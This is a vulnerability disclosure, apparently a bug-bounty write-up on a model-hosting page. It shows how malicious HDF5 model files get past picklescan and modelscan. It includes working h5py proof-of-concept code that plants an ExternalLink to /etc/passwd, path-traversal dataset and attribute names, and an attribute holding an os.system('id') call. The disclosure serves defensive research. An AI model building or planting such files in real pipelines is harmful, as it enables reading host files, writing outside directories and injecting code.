HDF5: External Link File Read + Path Traversal + Attribute Injection

Summary

Three non-pickle attack classes against the HDF5 model file format (.h5, .hdf5) that bypass both picklescan 1.0.4 and modelscan 0.8.8 (3/3 MISSED by both):

  1. External link β†’ arbitrary file read β€” HDF5 ExternalLink objects reference files on the host filesystem. When accessed, h5py opens the linked file. A malicious model with ExternalLink("/etc/passwd", "/") reads host files.
  2. Path traversal in dataset names β€” Dataset paths like ../../../tmp/evil are accepted and preserved in the HDF5 virtual filesystem. Tools that extract datasets to disk write outside the target directory.
  3. Code injection in attributes β€” Attribute names and values accept arbitrary strings including Python code and path traversal characters. Downstream tools that eval attributes or use attribute names as paths are vulnerable.

Format: HDF5 ($1,500 MFV) Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 β€” 3/3 MISSED by both

Payloads

File Attack Impact picklescan modelscan
hdf5_external_link.h5 ExternalLink("/etc/passwd", "/") Arbitrary file read when link is accessed MISSED MISSED
hdf5_traversal.h5 Dataset path ../../../tmp/pwned File write on dataset extraction MISSED MISSED
hdf5_attr_injection.h5 Code in attribute value + traversal in attribute name Injection if attrs are evaluated or used as paths MISSED MISSED

Vulnerability Details

External Link β†’ File Read (CWE-22)

HDF5 supports external links that reference other files. When a dataset accessed via an external link is read, h5py opens the referenced file from the host filesystem:

import h5py, numpy as np

# Create malicious model
with h5py.File("evil_model.h5", 'w') as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret_data"] = h5py.ExternalLink("/etc/passwd", "/")

# Victim loads model and iterates datasets:
with h5py.File("evil_model.h5", 'r') as f:
    for key in f.keys():
        data = f[key]  # accessing "secret_data" opens /etc/passwd

In ML pipelines, models are loaded from untrusted sources (Hugging Face Hub, shared storage). The external link is embedded in the HDF5 file itself β€” no user interaction beyond loading.

Path Traversal in Dataset Names (CWE-22)

HDF5's virtual filesystem accepts path traversal in group/dataset names:

with h5py.File("model.h5", 'w') as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0]))

The .. component navigates up in the HDF5 group hierarchy. While h5py resolves this internally, tools that map HDF5 paths to filesystem paths during extraction are vulnerable.

Attribute Injection (CWE-94)

Attribute names and values are unrestricted:

with h5py.File("model.h5", 'w') as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'

Verified: both attribute names with path traversal and values with Python code are preserved verbatim. Tools that:

  • Use attribute names as file paths (export tools)
  • Render attribute values in web UIs (model registries)
  • Pass attribute values to template engines or eval()

are vulnerable to injection.

Proof of Concept

import h5py, numpy as np

# Payload 1: External link
with h5py.File("hdf5_external_link.h5", 'w') as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret"] = h5py.ExternalLink("/etc/passwd", "/")

# Payload 2: Path traversal
with h5py.File("hdf5_traversal.h5", 'w') as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0, 2.0]))
    f.create_dataset("normal_weights", data=np.random.randn(10, 10))

# Payload 3: Attribute injection
with h5py.File("hdf5_attr_injection.h5", 'w') as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'

References

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support